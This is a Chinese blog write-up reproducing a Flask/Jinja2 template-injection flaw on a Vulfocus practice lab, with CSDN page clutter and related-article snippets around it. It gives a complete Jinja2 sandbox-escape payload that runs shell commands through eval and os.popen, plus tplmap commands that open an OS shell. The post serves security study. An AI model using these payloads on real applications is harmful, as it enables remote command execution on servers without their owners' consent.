flask-ssti 模板注入复现

最新推荐文章于 2024-05-29 09:46:22 发布
最新推荐文章于 2024-05-29 09:46:22 发布
阅读量1k 收藏 3
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 apache web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121469005
版权

所有文章,仅供安全研究与学习之用,后果自负!

flask-ssti 模板注入复现

flask-ssti 模板注入复现

0x01 漏洞描述

Flask 是一个 web 框架。也就是说 Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 wdb 应用程序可以使一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。

0x02 影响范围

0x03 漏洞复现

访问靶场
在这里插入图片描述

1 手工验证漏洞是否存在

?name=123
?name=<script>alert(123)</script>
?name={{2*3}}

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

2.执行命令

poc 如下
修改 “id” 即可

?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval']('__import__("os").popen("id").read()') }}{% endif %}{% endif %}  {% endfor %}{% endif %}{% endfor %}

在这里插入图片描述

获取flag

http://vulfocus.fofa.so:24935/?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval']('__import__("os").popen("ls /tmp").read()') }}{% endif %}{% endif %}  {% endfor %}{% endif %}{% endfor %}

在这里插入图片描述

tplmap工具验证

python2 运行

python2 tplmap.py   -u 'http://vulfocus.fofa.so:24935/?name=guest'

存在漏洞
在这里插入图片描述

执行系统命令

python2 tplmap.py  --os-shell  -u 'http://vulfocus.fofa.so:24935/?name=guest'

在这里插入图片描述

0x04 漏洞修复

针对于不同的模板引擎,该漏洞的修复方法会有所不同,但如果在传递给模板指令之前,对用户输入进行安全过滤的话,则可以大大减少这类威胁。

另一种防御方法是使用沙箱环境,将危险的指令删除/禁用,或者对系统环境进行安全加固。

LuckyCharm~
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Flask(Jinja2) 服务端模板注入漏洞复现
锋刃科技的博客
01-17 693
简介 Flask 是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2 。 漏洞概述 其中采用jinja2模板引擎传递参数,在书写不规范的时候会发生jinja模板语法的注入命令执行 环境搭建 这里使用vulhub进行搭建 地址: https://github.com/vulhub/vulhub/tree/master/flask/ssti 进入目录并编译运行测试环境 cd vu...
Flask(Jinja2) 服务端模板注入漏洞 复现
m0_46580995的博客
07-19 310
Flask(Jinja2) 服务端模板注入漏洞 复现环境vulhub 访问ip/?name={{a*b}} 使用tplmap一把梭 `from flask import Flask, request from jinja2 import Template app = Flask(name) @app.route("/") def index(): name = request.args.get(‘name’, ‘guest’) t = Template("Hello " + name) return t.r
Flask(Jinja2) 服务端模板注入漏洞
weixin_43047908的博客
08-18 746
目录前言SSTI简介Flask与jinja2关于Jinja2模板引擎服务器端模板注入SSTI什么是服务器端模板注入?服务器端模板注入有什么影响?服务器端模板注入漏洞如何产生?服务端模板注入漏洞复现漏洞环境搭建漏洞复现 前言 SSTI简介 MVC是一种框架型模式,全名是Model View Controller。 即模型(model)-视图(view)-控制器(controller) 在MVC的指导下开发中用一种业务逻辑、数据、界面显示分离的方法组织代码,将业务逻辑聚集到一个部件里面,在改进和个性化定制界面及
Centos 7下的VulFocus靶场搭建详细教程(含遇到问题解答)
最新发布
天泽岁月
05-29 1361
centos7 部署vulfocus靶场超级详细教程
详解SSTI模板注入
LYJ20010728的博客
09-09 3882
详解SSTI模板注入SSTI简介常见的模板引擎PHPJAVAPYTHONRUBYGOLANGSSTI产生的原因常用检测工具 TplmapFlask/Jinja模板引擎的相关绕过Flask简介demo漏洞代码基础知识沙盒逃逸Python的内建函数名称空间类继承寻找Python-SSTI攻击载荷的过程攻击载荷过程常用的目标函数常见的中间对象fuzz可利用类脚本服务端fuzzPython常用的命令执行方式Python-Web框架配置文件TornadoflaksFlask过滤器定义使用方式用的过滤器模块查找脚本常见
Flask服务端模板(Jinja2)注入漏洞(SSTI)复现
又菜又爱倒腾的博客
10-29 1305
#Flask服务端模板(Jinja2)注入漏洞(SSTI)复现# 一、漏洞简介 服务器模板注入(SSTI)是一种利用公共 Web框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI攻击可以利用拼接恶意用户输入导致各种漏洞。通过模板Web应用可以把输入转换成特定的HTML文件或者email格式。 二、漏洞影响 影响版本 使用Flask框架开发并且使用Jinja2模板引擎,最重要的是模板内容可控。满足该条件的Flask模块中几乎都存在注入漏洞。 三、产生原因 from
Flask框架-SSTI模板注入漏洞
soldi_er的博客
04-30 1481
文章目录使用Flask搭建网站模板渲染flask有2个渲染方法测试代码1测试代码2存在漏洞的代码,测试代码3利用模板注入漏洞环境准备魔术方法和模块利用漏洞Payload测试和收录参考 使用Flask搭建网站   1、本地环境: 环境 版本 编辑器 Pycharm/2019.3.3 开发语言 Python/3.7.6 框架 Flask/1.1.1 渲染 Jinja2/2.11.1 Response指纹 Server: Werkzeug/1.0.0 Python/3.7.6
flask-security-admin-example:结合Flask-Security和Flask-Admin的示例
05-01
结合Flask-Security和Flask-Admin的示例史蒂夫·萨波特(Steve Saporta) 2014年4月15日 Flask-Security提供了一种向Flask Web应用程序添加身份验证和授权的便捷方法。 Flask-Admin提供了一种对数据库表执行CRUD操作...
Flask-2.2.2-py3-none-any.whl
02-04
该资源为Flask-2.2.2-py3-none-any.whl,欢迎下载使用哦!
flask-vuejs-template:Flask + Vue JS模板
02-05
Flask-VueJs-Template :hot_pepper: :victory_hand: Flask + Vue.js Web应用程序模板 产品特点 最小烧瓶1.0应用 API具有基于类的安全资源路由 入门级测试套件 +纱 用于后端通信 Vue样本 一键部署+ Gunicorn的...
flask-mysqldb:Flask Web框架MySQL扩展
02-05
Flask-MySQLdb Flask-MySQLdb为Flask提供MySQL连接。 快速开始 首先,安装Flask-MySQLdb: $ pip install flask-mysqldb Flask-MySQLdb依赖于并将为您安装Flask的最新版本(0.12.4或更高版本)和 。 Flask-MySQLdb...
flask-dashboard-adminlte:AdminLTE Flask-开源种子项目| 应用种子
02-05
Flask Framework中的AppSeed生成的。 最好的开源管理仪表板和控制面板主题之一。 AdminLTE建立在Bootstrap之上,提供了一系列响应Swift,可重复使用且常用的组件。 产品特点 DBMS:SQLite,PostgreSQL(生产) ...
SSTI模板注入漏洞(vulhub 复现)
weixin_74790320的博客
02-18 1291
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,,模板引擎会提供一套生成html代码的程序,,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。模板引擎也会提供沙,但是可以用简而言之我的理解是模板引擎的关键就是只需要用户提供数据给模板便可以生成前端html页面,模板引擎有一定的防范机制,但是可以利用一定技术去绕过破解。
jinja2模板注入_Flask服务端模板(Jinja2)注入漏洞(SSTI复现
weixin_39654751的博客
12-21 222
目录:1.漏洞概述2.影响范围3.漏洞等级4.漏洞复现(1)环境搭建(2)漏洞利用5.漏洞原理(1)分析payload(2)分析源码6.修复建议1.漏洞概述服务器模板注入(SSTI)是一种利用公共 Web框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI攻击可以利用拼接恶意用户输入导致各种漏洞。通过模板Web应用可以把输入转换成特定的HTM...
VMware Workspace ONE Access SSTI 漏洞复现(CVE-2022-22954)
xiaobai_20190815的博客
05-17 1322
一、漏洞描述 VMware Workspace ONE Access 及 Identity Manager 存在一个由服务器模板注入导致的远程命令执行漏洞,未经身份验证的攻击者可以利用此漏洞进行远程任意代码执行。 二、影响版本 Linux Linux Kernel * * * Vmware Identity Manager 3.3.3 * * * Vmware Identity Manager 3.3.4 * * * Vmware Identity Manager 3.3.5 * * * Vm
python flask框架知识点总结(全)
ZAQ13253166101的博客
07-23 277
文件所在位置请访问此文本https://download.csdn.net/download/ZAQ13253166101/12651621
Vulfocus 入门+初级
大雾
05-20 3449
名称: 命令执行漏洞 描述: 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行 flag 存放在tmp路径下 名称: vulshare/python-flag:latest 描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置.
vulfocus靶场搭建(实测)
热门推荐
m0_50406447的博客
07-28 3万+
vulfocus的特性 1.启动:一键漏洞环境启动,方便简单。 2.自带 Flag 功能:每次启动 flag 都会自动更新,明确漏洞是否利用成功。 3.带有计分功能也可适用于相关安全人员能力的考核。 4.兼容 Vulhub、Vulapps 中所有漏洞镜像。 一、使用centos7作为靶机环境 1.挂载镜像 mkdir /mnt/cdrom:创建挂载点 mount /dev/cdrom /mnt/cdrom:镜像挂载 注意:这个必须已连接,否则镜像挂载失败 2.配置yum源 (1)进入y
【靶场】vulfocus搭建和场景编排
信安是不可或缺的一部分!
05-30 2632
构建的场景中的主要选一下比较新的漏洞,不然会出现横向移动很麻烦,还有一些漏洞需要回显,可能就会出现一些问题导致无法无法成功,建议场景搭建好后测试一下可行性,因为是docker可能会有一些命令无法使用,这也会造成一些困难。
Flask-Login Flask-Security 登录与权限控制
06-06
Flask-Login和Flask-Security都是Flask框架中常用的用于用户登录和权限控制的扩展库。 Flask-Login可以帮助开发者方便地实现用户登录功能,包括用户会话管理、认证和登录验证等。Flask-Login的主要功能是提供一个UserMixin类,开发者只需要继承这个类,实现其中的方法,就可以快速地实现用户认证和登录验证功能。 Flask-Security则是在Flask-Login的基础上对用户权限控制进行了扩展。它提供了一些常用的安全功能,如密码加密、用户注册、重置密码、邮箱确认等。同时,它也是一个可扩展的权限控制框架,可以方便地实现自定义的角色、权限等。 在使用Flask-Security时,需要先安装Flask-Login并在应用中进行初始化。然后,通过Flask-Security提供的装饰器和方法来实现权限控制。例如,通过@login_required装饰器来限制只有登录用户才能访问某些页面;通过@roles_required装饰器来限制只有特定角色的用户才能访问某些页面。 总之,Flask-Login和Flask-Security可以帮助开发者方便地实现用户登录和权限控制功能,提高Web应用的安全性和可维护性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值